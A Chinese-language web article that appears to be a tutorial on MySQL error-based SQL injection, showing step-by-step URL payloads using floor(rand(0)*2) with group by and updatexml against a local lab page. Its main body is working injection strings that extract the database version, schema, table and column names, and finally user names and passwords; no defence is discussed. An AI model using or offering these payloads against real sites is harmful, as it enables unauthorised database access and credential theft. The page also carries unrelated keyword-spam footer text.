千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 互联网科技 >

大数据中的报错注入是怎么样的

发表于:2025-12-04 作者:千家信息网编辑
千家信息网最后更新 2025年12月04日,这篇文章将为大家详细讲解有关大数据中的报错注入是怎么样的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。一、相关函数1、rand():产生一个0-1之间
千家信息网最后更新 2025年12月04日大数据中的报错注入是怎么样的

这篇文章将为大家详细讲解有关大数据中的报错注入是怎么样的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

一、相关函数

1、rand():产生一个0-1之间随机数,rand(0),随机产生一个0-1的随机数,运行多次产生的结果一样

2、floor():向下取整,floor(rand()*2),随机产生0和1两个数

3、group by:分组排列

4、count(*):统计数量

5、concat():将字符串连接起来

二、通过floor()函数构造注入语句

1、访问http://192.168.0.104/aiyou/bczr.php?id=2,返回正常页面

2、访问http://192.168.0.104/aiyou/bczr.php?id=2',返回错误页面

3、构造闭合语句,192.168.0.104/aiyou/bczr.php?id=2' --+,页面返回正常

4、获取数据库版本

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,(version()))x from information_schema.tables group by x )a) --+

5、获取数据库名称

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,database(),0x23)x from information_schema.tables group by x )a) --+

6、获取其他数据库名称(修改红色数字,获取不同数据库名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

7、获取表名(修改红色数字,获取不同表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

8、获取字段名,需要指定表名,表名用十六进制表示,修改红色数字获取不同字段

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x75736572 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

9、获取字段内容

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,name,0x3a,pass,0x23) FROM user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

三、通过updatexml函数构造注入语句

1、获取数据库名称(通过修改红色数字获取不同的数据库名称)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 5,1),1) -- +

2、获取表名(通过修改红色数字获取不同的表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 1,1),1) -- +

3、获取字段名(通过修改红色数字获取不同的字段)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、获取字段内容(修改红色数字,获取不同字段内容)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, pass,0x7e,name,0x7e) from user limit 1,1),1) -- +

关于大数据中的报错注入是怎么样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

很赞哦!
数据 不同 字段 数字 红色 数据库 内容 名称 函数 语句 页面 文章 更多 知识 篇文章 随机数 不错 两个 之间 十六进制 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 网络安全三巨头分析 M.ECHO曼音科技软件开发 网络安全特色信息 陕西互联网养老软件开发专业制作 杭州广桥集客网络技术有限公司 网络安全心理剧 安卓软件开发说明书2020 数据库迁移准确率 医院的无线网络安全吗 河南零起网络技术有限公司 杭州视赚网络技术有限公司 网络安全事件概述 司法部仲裁案例数据库 北邮校外访问校内服务器 TV软件开发教程 word模板动态填写数据库 企业管理器备份数据库 蓝色理想互联网科技工作室 数据库对象的区别和联系 腾讯云管理远程服务器 网络安全技术思考题 天翼网关无线网络安全模式 没有工作经验怎么转软件开发 黑蜂科网络技术有限公司 计算机二级网络技术笔试 服务器被德国异常登录 做软件开发也要上夜班吗 4g lte移动网络技术 哪里有三维数据库 请连接你的服务器是什么意思

相关文章

0